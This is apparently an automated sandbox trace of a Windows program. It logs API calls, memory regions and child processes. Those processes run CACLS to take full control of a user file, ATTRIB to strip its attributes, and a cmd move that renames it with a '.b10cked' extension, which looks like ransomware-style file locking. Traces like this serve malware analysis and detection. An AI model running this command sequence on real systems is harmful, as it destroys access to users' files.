lpTitle="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f0e8 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28f0e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc70, dwThreadId=0x67c)) returned 1 [0217.346] CloseHandle (hObject=0x4c) returned 1 [0217.346] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.346] GetEnvironmentStringsW () returned 0x3d0228* [0217.346] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.346] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0217.422] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28efdc | out: lpExitCode=0x28efdc*=0x0) returned 1 [0217.422] CloseHandle (hObject=0x50) returned 1 [0217.422] _vsnwprintf (in: _Buffer=0x28f124, _BufferCount=0x13, _Format="%08X", _ArgList=0x28efe8 | out: _Buffer="00000000") returned 8 [0217.422] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.422] GetEnvironmentStringsW () returned 0x3d2260* [0217.423] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.423] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.423] GetEnvironmentStringsW () returned 0x3d2260* [0217.423] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.423] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f040 | out: lpAttributeList=0x28f040) [0217.423] GetConsoleTitleW (in: lpConsoleTitle=0x28f424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.423] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.423] NeedCurrentDirectoryForExePathW 
(ExeName=".") returned 1 [0217.423] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.423] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.423] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.424] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.424] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.424] GetConsoleTitleW (in: lpConsoleTitle=0x28f1b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.424] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f040, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f108 | out: lpAttributeList=0x28f040, lpSize=0x28f108) returned 1 [0217.424] UpdateProcThreadAttribute (in: lpAttributeList=0x28f040, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f100, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f040, lpPreviousValue=0x0) returned 1 [0217.424] GetStartupInfoW (in: lpStartupInfo=0x28effc | out: lpStartupInfo=0x28effc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.424] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.424] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f09c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H 
\"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f0e8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessInformation=0x28f0e8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbd0, dwThreadId=0x618)) returned 1 [0217.426] CloseHandle (hObject=0x50) returned 1 [0217.426] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.426] GetEnvironmentStringsW () returned 0x3d2260* [0217.427] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.427] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0217.462] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28efdc | out: lpExitCode=0x28efdc*=0x0) returned 1 [0217.462] CloseHandle (hObject=0x4c) returned 1 [0217.462] _vsnwprintf (in: _Buffer=0x28f124, _BufferCount=0x13, _Format="%08X", _ArgList=0x28efe8 | out: _Buffer="00000000") returned 8 [0217.462] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.462] GetEnvironmentStringsW () returned 0x3d2260* [0217.462] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.462] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.462] GetEnvironmentStringsW () returned 0x3d2260* [0217.462] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.462] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f040 | out: lpAttributeList=0x28f040) [0217.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f841ac | out: lpMode=0x49f841ac) returned 1 [0217.463] _get_osfhandle (_FileHandle=0) 
returned 0x3 [0217.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f841b0 | out: lpMode=0x49f841b0) returned 1 [0217.463] SetConsoleInputExeNameW () returned 0x1 [0217.463] GetConsoleOutputCP () returned 0x1b5 [0217.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.463] exit (_Code=0) Process: id = "556" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166c0" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "555" os_parent_pid = "0xa0c" cmd_line = "CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32427 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32428 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32429 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32430 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32431 start_va = 0xd20000 end_va = 0xd28fff entry_point = 0xd20000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" 
(normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32432 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32433 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32434 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32435 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32436 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32437 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32438 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32439 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32440 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 32441 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 32442 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 32443 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32444 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32445 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32446 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32447 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32448 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 759 os_tid = 0x67c Thread: id = 760 os_tid = 0xd74 Process: id = "557" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16340" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "555" os_parent_pid = "0xa0c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 
[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32449 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32450 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32451 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32452 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32453 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32454 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32455 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32457 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 32458 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 
32459 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32460 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32461 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32462 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32463 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 32464 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32465 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32466 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32467 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32468 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32469 start_va = 0x769f0000 end_va = 
0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32470 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32471 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32472 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32473 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32474 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32475 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32476 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 32477 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32478 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 761 os_tid = 0x618 Process: id = "558" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32479 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32480 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32481 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32482 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32483 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32484 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32485 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32486 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32487 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 32488 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32519 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32520 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32521 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32522 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32523 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 32524 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32525 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" 
(normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32526 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32527 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32528 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32529 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32530 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32531 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32532 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32533 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 32534 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32535 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32536 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32537 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32538 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32539 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 32540 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 32541 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 32542 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 762 os_tid = 0xf54 [0217.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa54 | out: lpSystemTimeAsFileTime=0x26fa54*(dwLowDateTime=0xb6abe3e0, dwHighDateTime=0x1d440a9)) [0217.888] GetCurrentProcessId () returned 0xa84 [0217.888] GetCurrentThreadId () returned 0xf54 [0217.888] GetTickCount () returned 0x3ce65 [0217.888] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa4c | out: lpPerformanceCount=0x26fa4c*=27467769864) returned 1 [0217.889] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.889] __set_app_type (_Type=0x1) [0217.889] __p__fmode () returned 0x76b331f4 [0217.889] __p__commode () returned 0x76b331fc [0217.889] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 
[0217.889] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.890] GetCurrentThreadId () returned 0xf54 [0217.890] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf54) returned 0x38 [0217.890] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.890] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9e4 | out: phkResult=0x26f9e4*=0x0) returned 0x2 [0217.890] VirtualQuery (in: lpAddress=0x26fa1b, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9b4, 
